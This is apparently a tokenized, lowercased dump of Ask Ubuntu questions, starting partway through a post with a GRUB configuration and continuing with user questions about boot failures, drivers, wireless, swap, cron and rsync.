boundary . /dev/sda5 1151723520 1452771327 150523904 83 linux /dev/sda6 1452773376 1465147391 6187008 82 linux swap / solaris thanks in advance . edit1 : ~ $ cat /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=fr_fr insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi linux /boot/vmlinuz-3.8.0-27-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-27-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-c516a53f-bfa3-4140-8a30-18967123caa2 ' { menuentry 'ubuntu , with linux 3.8.0-27-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-27-generic-advanced-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-27-generic ... ' linux /boot/vmlinuz-3.8.0-27-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-27-generic } menuentry 'ubuntu , with linux 3.8.0-27-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-27-generic-recovery-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-27-generic ... ' linux /boot/vmlinuz-3.8.0-27-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-27-generic } menuentry 'ubuntu , with linux 3.8.0-26-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-26-generic-advanced-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-26-generic ... ' linux /boot/vmlinuz-3.8.0-26-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-26-generic } menuentry 'ubuntu , with linux 3.8.0-26-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-26-generic-recovery-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-26-generic ... ' linux /boot/vmlinuz-3.8.0-26-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-26-generic } menuentry 'ubuntu , with linux 3.8.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-advanced-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } menuentry 'ubuntu , with linux 3.8.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.8.0-19-generic-recovery-c516a53f-bfa3-4140-8a30-18967123caa2 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi echo 'loading linux 3.8.0-19-generic ... ' linux /boot/vmlinuz-3.8.0-19-generic root=uuid=c516a53f-bfa3-4140-8a30-18967123caa2 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 c516a53f-bfa3-4140-8a30-18967123caa2 else search -- no-floppy -- fs-uuid -- set=root c516a53f-bfa3-4140-8a30-18967123caa2 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 8 ( loader ) ( on /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-/dev/sda1 ' { insmod ldm drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # edit 2 : **~ $ sudo mount /dev/sda1 /mnt** **~ $ sudo umount /mnt** no problems
332407	getting a blank screen with the mouse when i re-log in	10 so any help you can give will be very useful i 'm using an hp g62 laptop with intel hd graphics card and an intel i3 quad-core processor . when i first boot my laptop , i can login just fine and work with the system . the problem begins when i lock the pc , when i leave it for a few minutes and return to work with the login box appears , i type in my password and press enter , the screen goes blank and all i can see is the mouse curser . and it hangs there till i either do a hard restart ( holding down the power button ) or when i log into tty1 and restart lightdm , the log in screen comes back and i can log in again but all my previously open programs are closed and all unsaved data is lost
332409	i have problems with skype	my question is , i am trying to make a video call and , 15 seconds after starting it , the web camera flash flashes and freezes the video that receives the other person my picture freezes is there any way that i can fix this ?
332415	caps lock as control key does not ( always ) work as control	for using caps lock as control key , i chose ( ubuntu 13.04 ) system settings - > keyboard - > typing - > layout settings - > options ... - > caps lock key behavior - > make caps lock an additional control but keep the caps_lock keysym . this works perfectly fine , i use caps lock as control all the time . however , when sending an email via gmail , the shortcut caps lock + return does not send the email , although control ( the good old control key ) + return does . should n't caps lock be just another control and thus work ? is the problem the `` but keep the caps_lock keysym '' ?
332417	how long should i expect a response from ubuntu one support ?	half of my files synced with ubuntu one from the past two years are no longer there after upgrading from 12.04 to 12.10 . i contacted support to help me recover the files from a specific time , but no one has responded , and it has been several days . is it possible to tell me when the staff have vacation , and when i can expect an answer ?
332422	do you need a .conf file in /etc/apache2 folder to run your website ?	i am still trying to make it work , there are different tutorials for the same setup . this tutorial says that you have to create a config file . apache2 web server but normally you do n't need that i guess , because you already have that in your /etc/apache2/sites-available configuration . so what does it change ?
332431	universal appindicator wrapper	suffering from ditched system tray support in 13.04. : ( is it technically possible to create universal appindicator wrapper for arbitrary application which supports only system tray icon ? maybe there are already existing infamous projects ? thanks .
332432	vnc not working from remmina ubuntu 12 . *	i am trying to connect to remote server ( redhat ) from remmina client in ubuntu 12.04 or 12.10 . the vnc port is opened on rh server . when i click connect on remmina , it hangs . debug mode log is anything missing in my configuration ? note : ssh is working cool from the remmina client with following configuration .
332433	install ubuntu on macbook air 6,2	i have tried to install ubuntu on a macbook air 6,2 without any success . i installed refit and from within macos deceased the mac partition . in order to create a boot medium , i followed the section `` manual approach '' in this guide . newer ubuntu images do not boot all the way , which i am relating to this bug . the only image i tried that booted all the way is 12.04 . however , in the installation process , i could not manage to proceed past the following dialogue : after a few moments , instead of the expected next dialogue window , the following is displayed : and then nothing changes . is this even related to the kernel bug , or how do i find out ? how am i supposed to proceed ? has anyone successfully installed ubuntu on a macbook air 6,2 ?
332434	how can i check the folder permissions in ubuntu server 12.04 ?	right now , i know that i can change persmissions for example with : sudo chmod 550 directory i wonder how i can check the actual folder permission .
332436	working with modprobe for getting wifi driver working	after several months of research finally my wifi driver is being detected and working fine ; ) that 's good news with credits where i found solution is here now , i still have one issue that every time i have to follow instructions to set modprobe done ( as per the instructions given in link ) . can someone help me out on how to make it done automatically when system starts ? i have ubuntu 12.04 , linux kernerl 3.2
332437	ubuntu dvd download not starting in other computer	i downloaded ubuntu to dvd and then inserted dvd in other computer but nothing happens . what am i not doing right ?
332438	how to check if a specific programm is installed ?	simple question , i want to check if a specific programm = sp is installed on ubuntu 12.04 server . i dont want to for sudo apt-get sp and i ca n't check all folders . is there a fast and good way ?
332450	is it possible to make ubuntu ask for my password before mounting usb-drives ?	i do n't want anybody to be able to copy my files anyhow , so i am asking if it is possible to make ubuntu ask for my password before mounting usb-drives and if it is , how to do it ?
332452	windows 8 partition does not boot	i am unable to boot my windows 8 partition , i have tried using boot repair several times . i no longer see the efi folder in my windows partition . i have tried editing the 40_custom file : menuentry `` windows 8 recovery '' { set root= ' ( hd0 , gpt2 ) '` chainloader /efi/boot/bootx64.efi } } menuentry `` windows 8 '' { set root= ' ( hd0 , gpt4 ) '` chainloader /efi/microsoft/boot/bootmgfw.efi } menuentry `` microsoft windows vista/7/8 x86_64 uefi-gpt '' { insmod part_gpt insmod fat insmod search_fs_uuid insmod chain search -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt1 1ce5-7f28 chainloader /efi/microsoft/boot/bootmgfw.efi } this is the list of the partitions : http : //paste.ubuntu.com/5984434/ . windows recovery environment ( loader ) ( on /dev/sda2 ) : error : ca n't find command drivemap . error : invalid efi file path windows 8 ( loader ) ( on /dev/sda4 ) : error : ca n't find command drivemap . error : invalid efi file path both ubuntu and windows were installed in uefi mode.if anyone has any ideas on how i can access my windows partition , thanks in advance .
332458	thunderbird mail	i am not able to send emails . i get the following message - sending of message failed . please verify that your mail & newsgroups account settings are correct and try again . about mail & newsgroups account settings . i know nothing about these type of settings and only want to send emails . i am using ubuntu 13.04 and thunderbird mail . the thunderbird help site do not answer this problem .
332459	machine goes to dhcp after reboot	our server if rebooted goes to dhcp even if we have provided static ip to the server . what all changes needs to be done so that even machine reboots it will boot with static ip . pl . help .
332462	connecting a creative zen vision : m mp3 player	is it possible to transfer tracks to a creative zen vision : m mp3 player via rhythmbox in ubuntu 12.04 ?
332466	ubuntu 12.04.2 installation problem : ca n't boot or use wubi	i am a windows user , but want to use ubuntu now . for this i have downloaded ubuntu 64-bit from the ubuntu site . but , i am not able to install it . i have tried both , booting from it as to clean install and through wubi . while booting from ubuntu , all i got was a black screen with a circle , an '= ' image and small human like image . it remains there for a while and thereafter an error message uncompression failed -- system halted appears and system reboot . here are last few lines of error log : 08-14 15:58 error tasklist : non fatal error [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) > in task download 08-14 15:58 debug tasklist : # # # finished download 08-14 15:58 error tasklist : could not retrieve the required disk image files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 592 , in get_diskimage exception : could not retrieve the required disk image files 08-14 15:58 debug tasklist : # cancelling tasklist 08-14 15:58 debug tasklist : # finished tasklist 08-14 15:58 error root : could not retrieve the required disk image files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 592 , in get_diskimage exception : could not retrieve the required disk image files while trying with wubi , it gives error could not retrieve the required disk image files . whereas i have complete ubuntu desktop installed . please guide me through this as i really want to move to ubuntu . please do not suggest that i have to download it again , as i have a very slow data connection . one thing i would like to share , is that i did n't downloaded the setup in one go , but many a times by resuming as my net connection is very bad . my laptop is dell inspiron 3521 with windows 7 ultimate 32-bit trial version is installed in it . but it is of 64 bit architecture . edit : just checked on my other desktop and it has same problem . though my desktop is of 32 bit architecture , so there had to be incompatibilty . do you think it could be because os on my laptop is 32 bit or trial version ? ? ? ? ?
332469	problem in installing mysqlworkbench 6	ubuntu 13.04 - 32 bit ( reading database ... 216964 files and directories currently installed . ) unpacking mysql-workbench-community ( from mysql-workbench-community-6.0.6-1ubu1304-i386.deb ) ... dpkg : error processing mysql-workbench-community-6.0.6-1ubu1304-i386.deb ( -- install ) : trying to overwrite '/usr/share/mysql-workbench/model_view.glade ' , which is also in package mysql-workbench-data 5.2.40+dfsg-2ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : mysql-workbench-community-6.0.6-1ubu1304-i386.deb please help..
332474	youtube framerate low in full screen	i 've just installed ubuntu 12.04 yesterday , and i 'm having problems watching video 's on youtube . once i get to full screen the frame rate drops to 16fps . my pc runs the latest games on very high , so i do n't think my hardware would be a problem . i 'm using chromium , but firefox has the same issue . other flash based streaming videos work fine ( like twitch.tv ) . it 's the same low frame rate between html5 and flash . basically it 's a youtube problem and not a flash issue .
332475	ubuntu zooms into my wallpaper on one monitor , but leaves other normal	i have a 23 '' 1080p widescreen in the center and a 19 '' 1280x1024 screen on the left . whenever i change the wallpaper , it looks nice on both of them , but a second later the 23 '' one zooms in and starts to look awful . the wallpaper is 1080p picture included ( 5 mb in size ) : http : //www.upload.ee/image/3512209/messed_up_desktop.png
332481	setup cron job to send email to a bunch of people on a regular basis	i want to send a fixed email reminder from my email address every monday , wednesday and friday to a bunch of people . how do i go about setting this up using crontab ? i have an email account on the mail server where i will setup the cron job , but the outgoing mails will be to gmail and hotmail accounts .
332482	kernel panic after removing files from full boot folder	on my acer aspire 7720z laptop , running ubuntu lucid lynx i got the message that the boot folder was full . looking around posts , i figured out it contained more files than i needed . so i deleted some , realizing the riskiness only too late . but , now i get : [ 5.780744 ] **kernel panic** - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) ( the number between square brackets varies with each attempt . ) the bootable usb , which i then made on my asus laptop , only resulted in a boot error , at best . how do i : get my data out of there ; - ) ? get ubuntu running again , so i can upgrade it to 12.04 lts ?
332484	usb bootable ubuntu	i am a newbie at this so please go easy . i just bought a brand new sandisk 32gb usb cruzer blade . it is genuinely 32gb . i then followed the instructions on ubuntu.com for making it a bootable usb . all that worked perfectly , however on booting from the usb drive i noticed that there is only 1.1gb - not enough space for installing vm player ( and certainly not linux mint inside that ) . forgive my naivety , but i would have expected more memory available than that given its a 32gb drive . what do i have to do increase the available space ? can i make use of all 32gb ? is there enough space for the drive to be bootable , have vm player , mint linux and other applications too ? i saw somewhere that the maximum is 4gb . is that right ? if so , then that is not much use . your help is much appreciated . http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu
332486	how do i copy current ubuntu partion and copy it into another partition then boot ubuntu from it ?	the reason for this is that i want to increase my ubuntu partition size but i unable to so because of some error like `` cant have overlapping partition '' so now i want to copy the contents of my whole partition and paste it in to another ext4 partition . i just want to know how to instruct grub to boot from that particular partition ( if needed ) ? here is the screenshot :
332489	what 's a good bluetooth speaker for conference calls ubuntu 12.10++	my corporate overlords love conference calls . increasingly i attend them using a voip client ( skype and internal tools ) . so i 'm wondering what ( bluetooth ) speaker ( not headset ) works well with ubuntu . i was looking at : jabra ( not bluetooth ) blackberry plantronics anybody got those to work ? alternate suggestions are welcome !
332492	what does the command `` users '' do ?	what does the command `` users '' do ? i do n't really get it : ( `` groups '' lists all groups . but `` users '' not all users . i hope you can help me : ) thanks in advance !
332506	how can i reinstall my wireless drivers for bcm broadcomm 4311	i am using ubuntu 12.10 , and i got the broadcomm 4311 bcm drivers working by the help from one of the ask ubuntu sites , but now for some reason the laptop looses connection on its own , while other pc 's and laptops have no problem whatsoever . the connection comes and goes . it ca n't be the network as other computer on wireless does n't have this problem . can it be the drivers acting up ? how can i reinstall them ? please assist , its really frustrating . i do n't know what else what to do .
332508	change the language of an ubuntu touch app	in my ubuntu touch app i need to be able to change the language of the app without rebooting the app or the device . is there a way to do it ?
332512	how to format and auto-mount the hdd after installing os to ssd ?	i made a clean install of linux mint 13 lts on my ssd which is in the optical drive bay . now , i will use the hdd for data storage and i do n't want the old data there where i just have installed the original win 7 which cames with the laptop ( thinkpad t530 ) and linux mint ( mint4win ) . the laptop is new and there is not any personal data on the hdd . so , i have to format it from ntfs to ext4 and also i want to mount it automatically on startup . for now i have access to the data there but i have to mount the drive manually each time . the standard software which cames with mint is disk utility ( installed gparted , too ) but i 'm not sure what to do . any idea how to do this ? note : i asked here because mint 13 lts is based on ubuntu 12.04 lts , so there should n't be something different .
332516	priveleges problem using rsync	i am trying to move a web directory from servera to serverb i have sudo priveleges on both , but i do not know root 's password . using the command rsync -a servera : /var/www serverb : /var/ i get an error that i do n't have the priveleges to mkdir on serverb . makes sense the permissions should not let me write to /var without sudo . so i try the same command with sudo . but it asks for root @ serverb password . which i do n't know . i do n't think i ever set one . the same thing happens if i run the command from either server . any ideas how to get around this ?
332519	can a single ubuntu sdk target touch and desktop with separate layouts ?	i know that touch apps will run on the desktop with the same ui , but i was wondering if it will be possible for a single ubuntu sdk app to have a multi-window ui with desktop style ui elements when running in desktop mode , while also providing a separate touch ui when running on touch platforms .
332520	remove tamil fonts from ubuntu	i have installed ubuntu using wubi from windows . but somehow tamil fonts came up . tamil fonts are appearing in menu bar . and files and folders are even named in tamil . how can i remove tamil language and make en-us as default ?
332522	ubunt 13.04 icons disappeared	my bars on top and at left disappeared . i can now only right click and choose - change desktop background - pressing ctrl+alt+t bring terminal out . problem is i know nothing about it . there is now only my wall paper on the screen .
332523	ubuntu 12.04 - how to do power off and power on of usb interfaces ?	like freebsd how can i do ubuntu 12.04 usb interface power off and power on ? is there any packages or source codes for ubuntu ? usbconfig -u 1 -a 2 suspend usbconfig -u 1 -a 2 resume usbconfig -u 1 -a 2 power_off usbconfig -u 1 -a 2 power_save usbconfig -u 1 -a 2 power_on # find usb devices $ cat /sys/bus/usb/devices/usb*/product ehci host controller ehci host controller xhci host controller xhci host controller # disable external wake-up ; do this only once echo disabled > /sys/bus/usb/devices/usb1/power/wakeup echo on > /sys/bus/usb/devices/usb1/power/level # turn on echo suspend > /sys/bus/usb/devices/usb1/power/level # turn off [ 29001.554561 ] warning ! power/level is deprecated ; use power/control instead
332524	creating a swap file or swap partition on the ssd/hdd	i have linux mint 13 lts which is based on ubuntu 12.04 lts . i installed it on my ssd and will use the hdd for data storage only . when installing the os i skipped making a swap file/partition . the machine has 8gb ram and i was n't sure whether i need a swap file at all . but after some reading i understood that the swap file is used in some cases even if there is free ram still . so , it seems that i will need it . should i create it like a file or like a partition ? should it be on the ssd or on the hdd ? if i create it on the hdd , could it be a bottleneck for the system because of the lower read/write speeds compared to the ssd where the os is installed ? what is the optimal size for a laptop with 8gb ram ?
332525	the same driver is n't being installed during every ubuntu 12.04 install	i have installed ubuntu 12.04 several times , and during installation sometimes the version 304 nvidia driver gets installed sometimes the version 173 . i checked the integrity of the dvd , of course . i 'm just asking if it could cause some kind problem or not , should i be worried , or calm ? hehehe
332526	`` error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass32 '' installing ati drivers	i was following the instructions on section 3.2 of this page . everything went well until step 8 , which is to use sudo amdconfig -- initial to create a new xorg.conf file , but i get the following error : amdconfig : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass32 i tried creating the file /etc/ld.so.conf.d/lib32.conf with /usr/lib32 inside , as the second answer here suggested , and ran sudo ldconfig but nothing changed . edit : installed libgl1-mesa-glx : i386 and ran sudo ldconfig , and problem persisted even after rebooting . edit2 : since step seven of the first link , after rebooting my top and side panels of unity and also the dash are missing , but i 'm assuming this will be fixed when i finish the drivers installation . edit3 : same error happens with fglrxinfo and glxinfo command ( before following step 7 glx info was normal ) . edit4 : output of lspci -v | grep -a10 vga ( complete output ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0572 flags : bus master , fast devsel , latency 0 , irq 45 memory at c1000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati chelsea lp [ radeon hd 7730m ] ( prog-if 00 [ vga controller ] ) subsystem : dell device 0572 flags : bus master , fast devsel , latency 0 , irq 16 memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at c0000000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at 3000 [ size=256 ] expansion rom at c0040000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci edit : output of dpkg -s libgl.so.1 : libgl1-mesa-glx : amd64 : /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 libgl1-mesa-glx : amd64 : /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1.2.0
332529	how to download any movie with qbittorrent ?	i recently downloaded the qbittorrent , but when i want to download a movie , and asking for choose an application , i just ca n't find the way to do it ... any ideas ?
332532	usb modem gets disconnected after some time in 12.04	i have huawei e1732 usb modem and i am using mobile-partner with it ( given by the manufacturer ) . recently the modem began to disconnect and the network does n't show up after it disconnects and i have to remove it and reinsert it to make it work . what should i do to prevent it from disconnecting again frequently ? also is there any way to control my usb modem using the terminal ? tail -n100 syslog gave the following output : tail -n100 syslog aug 21 17:58:24 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:24 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:25 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:25 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:25 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:25 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:26 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:26 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:26 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:26 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:27 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:27 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:27 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:27 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:28 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:28 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:28 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:28 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:29 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:29 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:29 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) entry . aug 21 17:58:29 sony-vpceh15en mobilepartner.bin : ndis_get_status ( ) exit . aug 21 17:58:30 sony-vpceh15en 